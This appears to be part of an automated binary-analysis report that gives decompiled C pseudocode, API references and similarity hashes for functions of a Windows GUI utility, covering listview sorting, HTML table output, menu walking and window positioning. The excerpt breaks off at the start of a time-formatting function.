• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
• String ID:
• API String ID: 1213725291-0
• Opcode ID: 3f23b09ed67182d54db4a1c9f3f8af9c1593430563a161df7ce732bfd0db5a6d
• Instruction ID: cbe089e464cab8641743a2df57c61d738c9647510a312ad91d4355c2b2932f4a
• Opcode Fuzzy Hash: 3f23b09ed67182d54db4a1c9f3f8af9c1593430563a161df7ce732bfd0db5a6d
• Instruction Fuzzy Hash: 94F0BB371003287BD23037B1ED4CD6B776CDB85B49B05013DF505F6652DA355C084AB9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%
			E004078E1(intOrPtr* __eax, void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t24;
				signed int _t75;
				signed int _t77;
				signed short _t86;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				signed short _t96;
				void* _t98;
				signed int _t126;
				signed int _t128;
				signed int _t130;
				intOrPtr* _t133;
				signed int _t137;
				signed int _t139;
				signed int _t140;
				void* _t142;
				void* _t143;
				void* _t147;

				_t143 = __eflags;
				_push(__ecx);
				_push(__ecx);
				_t133 = __eax;   /* this-pointer of the object being initialised */
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x6c))();
				E0040768E(__eax);
				 *(_t133 + 0x40) =  *(_t133 + 0x40) & 0x00000000;
				_t137 = 0xb;     /* 11 entries of 0x14 bytes each */
				 *((intOrPtr*)(_t133 + 0x2ac)) = _a4;
				_t126 = 0x14;
				_t75 = _t137 * _t126;
				 *(_t133 + 0x2e0) = _t137;
				_push( ~(0 | _t143 > 0x00000000) | _t75);
				L0040E038();
				 *(_t133 + 0x2e4) = _t75;
				_t128 = 0x14;
				_t77 = _t137 * _t128;
				_push( ~(0 | _t143 > 0x00000000) | _t77);
				L0040E038();
				_t98 = 0x4120c0;   /* start of a static table walked in 0x28-byte steps */
				 *(_t133 + 0x48) = _t77;
				_v8 = 0x4120c0;
				do {
					_t139 =  *_t98 * 0x14;
					memcpy( *(_t133 + 0x2e4) + _t139, _t98, 0x14);
					_t24 = _t98 + 0x14; // 0x4120d4
					memcpy( *(_t133 + 0x48) + _t139, _t24, 0x14);
					_t86 =  *( *(_t133 + 0x2e4) + _t139 + 0x10);
					_t142 = _t142 + 0x18;
					_v12 = _t86;
					 *( *(_t133 + 0x48) + _t139 + 0x10) = _t86;
					if((_t86 & 0xffff0000) == 0) {
						 *( *(_t133 + 0x2e4) + _t139 + 0x10) = E00406827(_t86 & 0x0000ffff);
						_t96 = E00406827(_v12 | 0x00010000);
						_t98 = _v8;
						 *( *(_t133 + 0x48) + _t139 + 0x10) = _t96;
					}
					_t98 = _t98 + 0x28;
					_t147 = _t98 - 0x412278;   /* end of the static table */
					_v8 = _t98;
				} while (_t147 < 0);
				 *(_t133 + 0x4c) =  *(_t133 + 0x4c) & 0x00000000;
				 *((intOrPtr*)(_t133 + 0x50)) = _a8;
				_t88 = 0xb;
				_t130 = 4;
				 *(_t133 + 0x34) = _t88;
				_t89 = _t88 * _t130;
				 *((intOrPtr*)(_t133 + 0x30)) = 0x20;
				_push( ~(0 | _t147 > 0x00000000) | _t89);
				L0040E038();
				_push(0xc);
				 *(_t133 + 0x38) = _t89;
				L0040E038();
				_t140 = _t89;
				if(_t89 == 0) {
					_t90 = 0;
					__eflags = 0;
				} else {
					_t90 = E00407440(_a4,  *((intOrPtr*)(_t133 + 0x60)), _t140);
				}
				 *((intOrPtr*)(_t133 + 0x2cc)) = _t90;
				 *((intOrPtr*)(_t133 + 0x54)) = 1;
				 *((intOrPtr*)(_t133 + 0x58)) = 0;
				 *((intOrPtr*)(_t133 + 0x2c0)) = 1;
				 *((intOrPtr*)(_t133 + 0x2c4)) = 0;
				 *((intOrPtr*)(_t133 + 0x2c8)) = 0;
				 *((intOrPtr*)(_t133 + 0x2d0)) = 1;
                                                                                                                                                				 *((intOrPtr*)(_t133 + 0x2d4)) = 1;
                                                                                                                                                				 *((intOrPtr*)(_t133 + 0x344)) = 0x32;
                                                                                                                                                				 *((intOrPtr*)(_t133 + 0x64)) = 0xffffff;
                                                                                                                                                				return E00407861(_t133);
                                                                                                                                                			}


                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00407923
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040793F
                                                                                                                                                • memcpy.MSVCRT ref: 00407962
                                                                                                                                                • memcpy.MSVCRT ref: 00407973
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004079F4
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004079FE
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                  • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                  • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                  • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                  • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                • String ID: x"A
                                                                                                                                                • API String ID: 975042529-63625180
                                                                                                                                                • Opcode ID: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
                                                                                                                                                • Instruction ID: 8801afb4ace5fbedb5bd820c2c75847393e8be4378505899df7aece04ba2f2e1
                                                                                                                                                • Opcode Fuzzy Hash: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
                                                                                                                                                • Instruction Fuzzy Hash: 79418DB2A01712AFD718DF3AD485B99BBA4BF04314F10422FE609DB2C1D775B8208B98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 49%
                                                                                                                                                			E004031BE(intOrPtr _a4) {
                                                                                                                                                				struct HWND__* _v8;
                                                                                                                                                				signed int _v12;
                                                                                                                                                				int _v16;
                                                                                                                                                				int _v20;
                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                				short _v28;
                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                				char* _v60;
                                                                                                                                                				void* _v72;
                                                                                                                                                				void _v582;
                                                                                                                                                				char _v584;
                                                                                                                                                				struct HWND__* _t52;
                                                                                                                                                				intOrPtr* _t58;
                                                                                                                                                				void* _t59;
                                                                                                                                                				intOrPtr _t63;
                                                                                                                                                				void* _t71;
                                                                                                                                                				intOrPtr _t77;
                                                                                                                                                				void* _t78;
                                                                                                                                                				intOrPtr _t79;
                                                                                                                                                				void* _t82;
                                                                                                                                                				intOrPtr _t87;
                                                                                                                                                				signed int _t89;
                                                                                                                                                				short* _t90;
                                                                                                                                                				void* _t92;
                                                                                                                                                				void* _t93;
                                                                                                                                                
                                                                                                                                                				_t87 = _a4;
                                                                                                                                                				_t52 = GetDlgItem( *(_t87 + 0x10), 0x3e9);
                                                                                                                                                				_v8 = _t52;
                                                                                                                                                				SendMessageW(_t52, 0x1009, 0, 0);
                                                                                                                                                				SendMessageW(_v8, 0x1036, 0, 0x26);
                                                                                                                                                				do {
                                                                                                                                                				} while (SendMessageW(_v8, 0x101c, 0, 0) != 0);
                                                                                                                                                				_push(0xc8);
                                                                                                                                                				_push(0);
                                                                                                                                                				_push(0);
                                                                                                                                                				_push(_v8);
                                                                                                                                                				_t78 = 6;
                                                                                                                                                				E00402842(0x40f454, _t78);
                                                                                                                                                				_t58 =  *((intOrPtr*)(_t87 + 0x40));
                                                                                                                                                				_t79 =  *((intOrPtr*)(_t58 + 4));
                                                                                                                                                				_t77 =  *_t58;
                                                                                                                                                				_t93 = _t92 + 0x10;
                                                                                                                                                				_v24 = _t79;
                                                                                                                                                				_v16 = 0;
                                                                                                                                                				if(_t79 <= 0) {
                                                                                                                                                					L10:
                                                                                                                                                					_t59 = 2;
                                                                                                                                                					E004027D3(_t59, _v8, 0, _t59);
                                                                                                                                                					return SetFocus(_v8);
                                                                                                                                                				} else {
                                                                                                                                                					goto L3;
                                                                                                                                                				}
                                                                                                                                                				do {
                                                                                                                                                					L3:
                                                                                                                                                					_v12 = 0;
                                                                                                                                                					_v20 = 0;
                                                                                                                                                					do {
                                                                                                                                                						_t89 = _v12 << 2;
                                                                                                                                                						if( *((short*)(_t77 + _t89 + 2)) == _v16) {
                                                                                                                                                							_v584 = 0;
                                                                                                                                                							memset( &_v582, 0, 0x1fe);
                                                                                                                                                							_t93 = _t93 + 0xc;
                                                                                                                                                							_v60 =  &_v584;
                                                                                                                                                							_v72 = 4;
                                                                                                                                                							_v56 = 0xff;
                                                                                                                                                							if(SendMessageW( *( *((intOrPtr*)(_a4 + 0x40)) + 8), 0x105f, _v12,  &_v72) != 0) {
                                                                                                                                                								_push(0);
                                                                                                                                                								_push(_v12);
                                                                                                                                                								_push(0);
                                                                                                                                                								_push(0);
                                                                                                                                                								_push(0);
                                                                                                                                                								_push(_v8);
                                                                                                                                                								_t82 = 5;
                                                                                                                                                								_t71 = E004028C5( &_v584, _t82);
                                                                                                                                                								_t90 = _t89 + _t77;
                                                                                                                                                								_t83 =  *_t90;
                                                                                                                                                								_v28 =  *_t90;
                                                                                                                                                								E00402CD0(_v8, _t71, 0 | _t83 > 0x00000000);
                                                                                                                                                								_t93 = _t93 + 0x24;
                                                                                                                                                								if(_v28 == 0) {
                                                                                                                                                									 *_t90 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x44)) + _v20 + 0xc));
                                                                                                                                                								}
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                						_v12 = _v12 + 1;
                                                                                                                                                						_t63 = _v24;
                                                                                                                                                						_v20 = _v20 + 0x14;
                                                                                                                                                					} while (_v12 < _t63);
                                                                                                                                                					_v16 = _v16 + 1;
                                                                                                                                                				} while (_v16 < _t63);
                                                                                                                                                				goto L10;
			}

Instruction addresses: 0x004031ca 0x004031d5 0x004031eb 0x004031ee 0x004031fb 0x004031fd 0x00403209 0x0040320d 0x00403212 0x00403213 0x00403214 0x0040321e 0x0040321f 0x00403224 0x00403227 0x0040322a 0x0040322c 0x00403231 0x00403234 0x00403237 0x00403313 0x00403315 0x0040331b 0x00403330 0x00000000 0x00000000 0x00000000 0x0040323d 0x0040323d 0x0040323d 0x00403240 0x00403243 0x00403246 0x00403251 0x00403264 0x0040326b 0x00403279 0x00403282 0x0040328c 0x00403299 0x004032a8 0x004032aa 0x004032ab 0x004032b4 0x004032b5 0x004032b6 0x004032b7 0x004032bc 0x004032bd 0x004032c2 0x004032c4 0x004032ce 0x004032d6 0x004032db 0x004032e1 0x004032f1 0x004032f1 0x004032e1 0x004032a8 0x004032f4 0x004032f7 0x004032fa 0x004032fe 0x00403307 0x0040330a 0x00000000

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32 ref: 004031D5
                                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 004031EE
                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 004031FB
                                                                                                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00403207
                                                                                                                                                • memset.MSVCRT ref: 0040326B
                                                                                                                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 004032A0
                                                                                                                                                • SetFocus.USER32(?), ref: 00403326
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4281309102-0
                                                                                                                                                • Opcode ID: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
                                                                                                                                                • Instruction ID: e5884d61c50a84840a295c8cd46100b63ab271327737e15352f16c4cecb35b78
                                                                                                                                                • Opcode Fuzzy Hash: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
                                                                                                                                                • Instruction Fuzzy Hash: 46418A35900219BFDB20EF85CD89EAFBF78EF04354F1040AAF908B6291D3719A40DBA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 62%
                                                                                                                                                			E00408AFA(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                				signed int _v8;
                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                				signed int _v16;
                                                                                                                                                				signed int _v20;
                                                                                                                                                				signed int _v24;
                                                                                                                                                				signed int _v28;
                                                                                                                                                				void _v68;
                                                                                                                                                				char _v108;
                                                                                                                                                				void _v160;
                                                                                                                                                				void* __esi;
                                                                                                                                                				signed int _t55;
                                                                                                                                                				void* _t57;
                                                                                                                                                				wchar_t* _t67;
                                                                                                                                                				intOrPtr* _t73;
                                                                                                                                                				signed int _t74;
                                                                                                                                                				signed int _t86;
                                                                                                                                                				signed int _t94;
                                                                                                                                                				intOrPtr* _t97;
                                                                                                                                                				void* _t99;
                                                                                                                                                				void* _t101;
                                                                                                                                                
                                                                                                                                                				_t73 = __ebx;
                                                                                                                                                				_t74 = 0xd;
                                                                                                                                                				_push(9);
                                                                                                                                                				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
                                                                                                                                                				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
                                                                                                                                                				_t101 = _t99 + 0x18;
                                                                                                                                                				asm("movsw");
                                                                                                                                                				E00408857(__ebx, 0, _a4, L"<tr>");
                                                                                                                                                				_t94 = 0;
                                                                                                                                                				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
                                                                                                                                                					do {
                                                                                                                                                						_t55 =  *( *((intOrPtr*)(_t73 + 0x38)) + _t94 * 4);
                                                                                                                                                						_v8 = _t55;
                                                                                                                                                						_t57 =  &_v160;
                                                                                                                                                						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x48)) + 8)) == 0) {
                                                                                                                                                							_t57 =  &_v68;
                                                                                                                                                						}
                                                                                                                                                						_t97 = _a8;
                                                                                                                                                						_v28 = _v28 | 0xffffffff;
                                                                                                                                                						_v24 = _v24 | 0xffffffff;
                                                                                                                                                						_v20 = _v20 | 0xffffffff;
                                                                                                                                                						_v16 = _v16 & 0x00000000;
                                                                                                                                                						_v12 = _t57;
                                                                                                                                                						 *((intOrPtr*)( *_t73 + 0x34))(5, _t94, _t97,  &_v28);
                                                                                                                                                						E0040DBA9(_v28,  &_v108);
                                                                                                                                                						E0040DBDA( *((intOrPtr*)( *_t97))(_v8,  *((intOrPtr*)(_t73 + 0x68))),  *(_t73 + 0x6c));
                                                                                                                                                						 *((intOrPtr*)( *_t73 + 0x54))( *(_t73 + 0x6c), _t97, _v8);
                                                                                                                                                						_t67 =  *(_t73 + 0x6c);
                                                                                                                                                						_t86 =  *_t67 & 0x0000ffff;
                                                                                                                                                						if(_t86 == 0 || _t86 == 0x20) {
                                                                                                                                                							wcscat(_t67, L"&nbsp;");
                                                                                                                                                							_pop(0);
                                                                                                                                                						}
                                                                                                                                                						E0040DC79( &_v28,  *((intOrPtr*)(_t73 + 0x70)),  *(_t73 + 0x6c));
                                                                                                                                                						_push( *((intOrPtr*)(_t73 + 0x70)));
                                                                                                                                                						_push( &_v108);
                                                                                                                                                						_push(_v12);
                                                                                                                                                						_push(0x2000);
                                                                                                                                                						_push( *((intOrPtr*)(_t73 + 0x68)));
                                                                                                                                                						L0040DFD6();
                                                                                                                                                						_t101 = _t101 + 0x1c;
                                                                                                                                                						E00408857(_t73, 0, _a4,  *((intOrPtr*)(_t73 + 0x68)));
                                                                                                                                                						_t94 = _t94 + 1;
                                                                                                                                                					} while (_t94 <  *((intOrPtr*)(_t73 + 0x34)));
                                                                                                                                                				}
                                                                                                                                                				return E00408857(_t73, 0, _a4, L"\r\n");
                                                                                                                                                			}


                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                                                • Opcode ID: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
                                                                                                                                                • Instruction ID: 96aa4744b540e0de5a537674df1821739e57c2366694ca0e95279aca4d83ea93
                                                                                                                                                • Opcode Fuzzy Hash: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
                                                                                                                                                • Instruction Fuzzy Hash: 10318D31900208AFDF10AF55CC85E9A7B75FF04320F1040BAF855AB2E2DB35A945DB94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 42%
                                                                                                                                                			E00406E97(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                                                                                                				struct tagMENUITEMINFOW _v0;
                                                                                                                                                				int _t24;
                                                                                                                                                				wchar_t* _t30;
                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                				int _t34;
                                                                                                                                                				int _t42;
                                                                                                                                                				signed int _t47;
                                                                                                                                                				signed int _t48;
                                                                                                                                                
                                                                                                                                                				_t36 = __ecx;
                                                                                                                                                				_t48 = _t47 & 0xfffffff8;
                                                                                                                                                				E0040E340(0x203c, __ecx);
                                                                                                                                                				_t24 = GetMenuItemCount(_a8);
                                                                                                                                                				_t34 = _t24;
                                                                                                                                                				_t42 = 0;
                                                                                                                                                				if(_t34 <= 0) {
                                                                                                                                                					L13:
                                                                                                                                                					return _t24;
                                                                                                                                                				} else {
                                                                                                                                                					goto L1;
                                                                                                                                                				}
                                                                                                                                                				do {
                                                                                                                                                					L1:
                                                                                                                                                					memset( &_a50, 0, 0x2000);
                                                                                                                                                					_t48 = _t48 + 0xc;
                                                                                                                                                					_a36 =  &_a48;
                                                                                                                                                					_v0.cbSize = 0x30;
                                                                                                                                                					_a4 = 0x36;
                                                                                                                                                					_a40 = 0x1000;
                                                                                                                                                					_a16 = 0;
                                                                                                                                                					_a48 = 0;
                                                                                                                                                					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                                                                                                					if(_t24 == 0) {
                                                                                                                                                						goto L12;
                                                                                                                                                					}
                                                                                                                                                					if(_a48 == 0) {
                                                                                                                                                						L10:
                                                                                                                                                						_t56 = _a20;
                                                                                                                                                						if(_a20 != 0) {
                                                                                                                                                							_push(0);
                                                                                                                                                							_push(_a20);
                                                                                                                                                							_push(_a4);
                                                                                                                                                							_t24 = E00406E97(_t36, _t56);
                                                                                                                                                							_t48 = _t48 + 0xc;
                                                                                                                                                						}
                                                                                                                                                						goto L12;
                                                                                                                                                					}
                                                                                                                                                					_t30 = wcschr( &_a48, 9);
                                                                                                                                                					if(_t30 != 0) {
                                                                                                                                                						 *_t30 = 0;
                                                                                                                                                					}
                                                                                                                                                					_t31 = _a16;
                                                                                                                                                					if(_a20 != 0) {
                                                                                                                                                						if(_a12 == 0) {
                                                                                                                                                							 *0x412c34 =  *0x412c34 + 1;
                                                                                                                                                							_t32 =  *0x412c34; // 0x0
                                                                                                                                                							_t31 = _t32 + 0x11558;
                                                                                                                                                							__eflags = _t32 + 0x11558;
                                                                                                                                                						} else {
                                                                                                                                                							_t17 = _t42 + 0x11171; // 0x11171
                                                                                                                                                							_t31 = _t17;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					_t24 = E00406E5E(_t31,  &_a48);
                                                                                                                                                					_pop(_t36);
                                                                                                                                                					goto L10;
                                                                                                                                                					L12:
                                                                                                                                                					_t42 = _t42 + 1;
                                                                                                                                                				} while (_t42 < _t34);
                                                                                                                                                				goto L13;
                                                                                                                                                			}


                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                • String ID: 0$6
                                                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                                                • Opcode ID: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
                                                                                                                                                • Instruction ID: 1dbbb6522b92818e37563bbb7cb847876382a1d5db42aae0addc6953e8b82e52
                                                                                                                                                • Opcode Fuzzy Hash: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
                                                                                                                                                • Instruction Fuzzy Hash: 9021BF31105345ABC7209F61E84599FB7B8FB84754F000A3FF645A2280E7769A24CB9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                			E004019D2(void* __ebx) {
                                                                                                                                                				int _v8;
                                                                                                                                                				int _v12;
                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                				int _v24;
                                                                                                                                                				int _v28;
                                                                                                                                                				void* _t26;
                                                                                                                                                				int _t30;
                                                                                                                                                				void* _t33;
                                                                                                                                                				int _t36;
                                                                                                                                                				int _t37;
                                                                                                                                                				int _t40;
                                                                                                                                                				int _t49;
                                                                                                                                                
                                                                                                                                                				_t33 = __ebx;
                                                                                                                                                				if( *((intOrPtr*)(__ebx + 0x208)) == 0) {
                                                                                                                                                					return _t26;
                                                                                                                                                				} else {
                                                                                                                                                					asm("movsd");
                                                                                                                                                					asm("movsd");
                                                                                                                                                					asm("movsd");
                                                                                                                                                					asm("movsd");
                                                                                                                                                					_v8 = GetSystemMetrics(0x4e);
                                                                                                                                                					_v12 = GetSystemMetrics(0x4f);
                                                                                                                                                					_t40 = GetSystemMetrics(0x4c);
                                                                                                                                                					_t30 = GetSystemMetrics(0x4d);
                                                                                                                                                					if(_v8 == 0 || _v12 == 0) {
                                                                                                                                                						_v8 = GetSystemMetrics(0);
                                                                                                                                                						_v12 = GetSystemMetrics(1);
                                                                                                                                                						_t40 = 0;
                                                                                                                                                						_t30 = 0;
                                                                                                                                                					} else {
                                                                                                                                                						_v8 = _v8 + _t40;
                                                                                                                                                						_v12 = _v12 + _t30;
                                                                                                                                                					}
                                                                                                                                                					_t49 = _v20 - _v28;
                                                                                                                                                					if(_t49 > 0x14) {
                                                                                                                                                						_t37 = _v24;
                                                                                                                                                						_t36 = _v16 - _t37;
                                                                                                                                                						if(_t36 > 0x14 && _v20 > _t40 + 5) {
                                                                                                                                                							_t30 = _t30 + 0xfffffff6;
                                                                                                                                                							if(_t37 >= _t30) {
                                                                                                                                                								_t30 = _v28;
                                                                                                                                                								if(_t30 + 0x14 < _v8 && _t37 + 0x14 < _v12 &&  *((intOrPtr*)(_t33 + 0x250)) != 0) {
                                                                                                                                                									_t30 = SetWindowPos( *(_t33 + 0x208), 0, _t30, _t37, _t49, _t36, 0x204);
                                                                                                                                                								}
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					return _t30;
                                                                                                                                                				}
                                                                                                                                                			}
                                                                                                                                                0x004019d2
                                                                                                                                                0x004019df
                                                                                                                                                0x00401a94
                                                                                                                                                0x004019e5
                                                                                                                                                0x004019f0
                                                                                                                                                0x004019f1
                                                                                                                                                0x004019f2
                                                                                                                                                0x004019f3
                                                                                                                                                0x00401a00
                                                                                                                                                0x00401a07
                                                                                                                                                0x00401a0e
                                                                                                                                                0x00401a10
                                                                                                                                                0x00401a17
                                                                                                                                                0x00401a2b
                                                                                                                                                0x00401a30
                                                                                                                                                0x00401a33
                                                                                                                                                0x00401a35
                                                                                                                                                0x00401a1e
                                                                                                                                                0x00401a1e
                                                                                                                                                0x00401a21
                                                                                                                                                0x00401a21
                                                                                                                                                0x00401a3a
                                                                                                                                                0x00401a40
                                                                                                                                                0x00401a45
                                                                                                                                                0x00401a48
                                                                                                                                                0x00401a4d
                                                                                                                                                0x00401a57
                                                                                                                                                0x00401a5c
                                                                                                                                                0x00401a5e
                                                                                                                                                0x00401a67
                                                                                                                                                0x00401a8b
                                                                                                                                                0x00401a8b
                                                                                                                                                0x00401a67
                                                                                                                                                0x00401a5c
                                                                                                                                                0x00401a4d
                                                                                                                                                0x00000000
                                                                                                                                                0x00401a92

                                                                                                                                                APIs
                                                                                                                                                • GetSystemMetrics.USER32 ref: 004019FC
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00401A03
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00401A0A
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00401A10
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00401A27
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00401A2E
                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000204,?,?,?,?,?,004019CF), ref: 00401A8B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MetricsSystem$Window
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1155976603-0
                                                                                                                                                • Opcode ID: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
                                                                                                                                                • Instruction ID: e852b1759cb622fbc777dcf2117f8c3e284781620e86bac7d74114db1399c759
                                                                                                                                                • Opcode Fuzzy Hash: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
                                                                                                                                                • Instruction Fuzzy Hash: 27215C72E4221AEBDF10DFA88D496AF7B71EF40320F1141BAD904BB2D1D674A981CE94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00405C17(FILETIME* __eax, wchar_t* _a4) {
                                                                                                                                                				struct _SYSTEMTIME _v24;
                                                                                                                                                				long _v280;
                                                                                                                                                				long _v536;
                                                                                                                                                				FILETIME* _t15;
